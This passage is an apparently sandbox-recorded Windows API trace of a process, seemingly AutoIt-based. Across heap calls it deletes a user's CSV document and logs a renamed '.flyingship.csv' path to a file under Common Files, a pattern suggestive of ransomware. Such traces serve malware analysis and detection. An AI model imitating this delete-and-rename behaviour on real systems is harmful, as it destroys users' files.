lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0172.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0172.591] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0172.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0172.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0172.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0172.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0172.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0172.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0172.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0172.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0172.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0172.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0172.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0172.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0172.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0172.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0172.592] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0172.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0172.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0172.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0172.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0172.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0172.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0172.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0172.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0172.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.593] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.593] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.594] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.594] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0172.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd5b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0172.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0172.595] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0172.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0172.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0172.595] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0172.597] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.597] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.597] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.597] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.597] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.597] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0172.597] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.597] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.597] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.598] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.598] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.598] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.598] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.598] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv", lpFilePart=0x0) returned 0x44 [0172.600] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdb77400, ftCreationTime.dwHighDateTime=0x1d5e64d, ftLastAccessTime.dwLowDateTime=0x363ae3c0, ftLastAccessTime.dwHighDateTime=0x1d5dedf, ftLastWriteTime.dwLowDateTime=0xc3b9440, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x8295, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="mo9b RC5.csv", cAlternateFileName="MO9BRC~1.CSV")) returned 0x90af58 [0172.600] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\mo9b rc5.csv")) returned 1 [0172.602] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcdb77400, ftCreationTime.dwHighDateTime=0x1d5e64d, ftLastAccessTime.dwLowDateTime=0x363ae3c0, ftLastAccessTime.dwHighDateTime=0x1d5dedf, ftLastWriteTime.dwLowDateTime=0xc3b9440, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x8295, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="mo9b RC5.csv", cAlternateFileName="MO9BRC~1.CSV")) returned 0 [0172.602] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0172.603] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.603] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.603] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0172.603] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.604] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0172.604] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.604] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.604] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.604] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.604] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.605] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.605] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0172.605] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.605] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0172.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0172.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.606] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0172.607] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x10d3, lpOverlapped=0x0) returned 1 [0172.607] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0172.607] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x10d3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.607] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0172.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.607] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0172.607] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0172.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0172.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.flyingship.csv\r\n", cchWideChar=82, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 82 [0172.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x52) returned 0x8c4a48 [0172.608] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.flyingship.csv\r\n", cchWideChar=82, lpMultiByteStr=0x8c4a48, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\mo9b RC5.flyingship.csv\r\n", lpUsedDefaultChar=0x0) returned 82 [0172.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0172.608] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0172.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0172.608] WriteFile (in: hFile=0x120, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x51, lpOverlapped=0x0) returned 1 [0172.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0172.608] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0172.608] CloseHandle (hObject=0x120) returned 1 [0172.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0172.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0172.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0172.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0172.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0172.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0172.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0172.609] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0172.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0172.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0172.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0172.611] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0172.611] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0172.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0172.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0172.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0172.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0172.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0172.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0172.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0172.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0172.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0172.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0172.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0172.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0172.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0172.613] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0172.613] 